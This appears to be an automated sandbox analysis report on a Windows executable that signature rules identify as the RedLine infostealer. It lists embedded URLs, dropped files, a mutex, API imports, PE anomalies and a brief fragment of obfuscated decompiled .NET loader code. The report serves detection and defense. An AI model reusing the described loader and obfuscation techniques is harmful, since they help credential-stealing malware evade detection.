            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/UpLoadXmlT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/UpdateMeiNianZuTaoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/UpdatesSetDownT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/UploadStateT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ValiUserT
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B33E628 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0B33E628
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B33E61A GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0B33E61A

            System Summary

            barindex
            Source: BaGkRDSifo.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00408C600_2_00408C60
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040DC110_2_0040DC11
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00407C3F0_2_00407C3F
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00418CCC0_2_00418CCC
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00406CA00_2_00406CA0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004028B00_2_004028B0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0041A4BE0_2_0041A4BE
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004182440_2_00418244
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004016500_2_00401650
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00402F200_2_00402F20
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004193C40_2_004193C4
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004187880_2_00418788
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00402F890_2_00402F89
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00402B900_2_00402B90
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004073A00_2_004073A0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_024E2A160_2_024E2A16
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_024E10230_2_024E1023
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_024E10300_2_024E1030
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_05A370180_2_05A37018
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_05A300070_2_05A30007
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_05A300400_2_05A30040
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_05A370080_2_05A37008
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_05AAD8F40_2_05AAD8F4
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06AD3EE00_2_06AD3EE0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06AD3ED00_2_06AD3ED0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06AD67440_2_06AD6744
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06AD7C900_2_06AD7C90
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A3010400_2_0A301040
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A30F6C00_2_0A30F6C0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A302CB80_2_0A302CB8
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A301D450_2_0A301D45
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A3067E80_2_0A3067E8
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A3067D90_2_0A3067D9
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B33839F0_2_0B33839F
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B3377200_2_0B337720
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B3327900_2_0B332790
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B33B4800_2_0B33B480
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B33B4800_2_0B33B480
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B3377200_2_0B337720
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0BB82CD00_2_0BB82CD0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: String function: 0040E1D8 appears 44 times
            Source: BaGkRDSifo.exe, 00000000.00000003.1222145293.0000000000972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000003.1222105370.000000000096D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000036A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthUpdate.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000003.1222174993.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000003.1222214639.0000000000995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exeBinary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
            Source: BaGkRDSifo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: BaGkRDSifo.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal80.troj.evad.winEXE@1/2@0/1
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeFile created: C:\Users\user\Desktop\UpdateJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMutant created: NULL
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMutant created: \Sessions\1\BaseNamedObjects\STHealthClient
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCommand line argument: 08A0_2_00413780
            Source: BaGkRDSifo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BaGkRDSifo.exeVirustotal: Detection: 28%
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: mscorjit.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: BaGkRDSifo.exeStatic file information: File size 3972096 > 1048576
            Source: BaGkRDSifo.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x3a7c00
            Source: BaGkRDSifo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: BaGkRDSifo.exeStatic PE information: real checksum: 0x23bfb should be: 0x3cd867
            Source: STHealthUpdate.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x3eb3c
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06ACEAE3 pushfd ; retf 0_2_06ACEAE9
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_06ACEA58 push eax; retf 0_2_06ACEA59
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A308708 pushad ; retf 0_2_0A308709
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0A300C00 push esp; retn 0004h0_2_0A300C1C
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B333398 pushad ; iretd 0_2_0B3333A5
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0B332B9D pushad ; iretd 0_2_0B332B9E
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
            Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
